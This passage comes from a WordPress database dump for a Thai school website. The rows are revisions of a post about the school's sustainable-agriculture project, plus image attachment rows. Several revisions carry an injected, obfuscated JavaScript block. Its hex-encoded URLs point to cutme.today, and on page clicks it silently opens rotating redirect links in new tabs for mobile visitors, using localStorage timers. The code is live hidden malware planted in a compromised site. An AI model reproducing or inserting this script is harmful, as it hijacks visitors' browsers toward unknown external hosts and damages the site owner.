_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต  โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:43:10','2024-09-12 06:43:10','',367,'http://watprato.ssk.in.th/?p=379',0,'revision','',0),
(381,2,'2024-09-12 13:43:48','2024-09-12 06:43:48','<!-- wp:image {\"id\":373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n-1024x726.jpg\" alt=\"\" class=\"wp-image-373\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:43:48','2024-09-12 06:43:48','',367,'http://watprato.ssk.in.th/?p=381',0,'revision','',0),
(383,2,'2024-09-12 13:45:03','2024-09-12 06:45:03','','458252036_122175357182202781_526320192492554342_n','','inherit','open','closed','','458252036_122175357182202781_526320192492554342_n','','','2024-09-12 13:45:03','2024-09-12 06:45:03','',367,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/458252036_122175357182202781_526320192492554342_n.jpg',0,'attachment','image/jpeg',0),
(384,2,'2024-09-12 13:45:20','2024-09-12 06:45:20','','458290652_122175359900202781_4995696793881930390_n','','inherit','open','closed','','458290652_122175359900202781_4995696793881930390_n','','','2024-09-12 13:45:20','2024-09-12 06:45:20','',367,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/458290652_122175359900202781_4995696793881930390_n.jpg',0,'attachment','image/jpeg',0),
(385,2,'2024-09-12 13:45:23','2024-09-12 06:45:23','<!-- wp:image {\"id\":373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n-1024x726.jpg\" alt=\"\" class=\"wp-image-373\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:image {\"id\":383,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458252036_122175357182202781_526320192492554342_n-1024x726.jpg\" alt=\"\" class=\"wp-image-383\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":384,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458290652_122175359900202781_4995696793881930390_n-1024x726.jpg\" alt=\"\" class=\"wp-image-384\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x